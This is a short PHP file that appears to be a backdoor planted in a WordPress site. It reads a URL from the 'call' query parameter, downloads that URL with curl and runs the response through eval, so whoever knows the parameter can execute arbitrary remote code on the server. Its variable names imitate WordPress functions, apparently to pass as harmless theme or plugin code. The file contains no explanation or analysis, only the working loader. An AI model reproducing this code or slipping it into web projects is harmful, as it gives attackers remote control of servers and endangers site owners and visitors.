<?php
if (isset($_GET['call'])) {
$wp_reset_postdata_ea = $_GET['call'];
if ($get_permalink_cy = curl_init()) {
curl_setopt($get_permalink_cy, CURLOPT_URL, $wp_reset_postdata_ea);
curl_setopt($get_permalink_cy, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($get_permalink_cy));
curl_close($get_permalink_cy);
exit;
}
}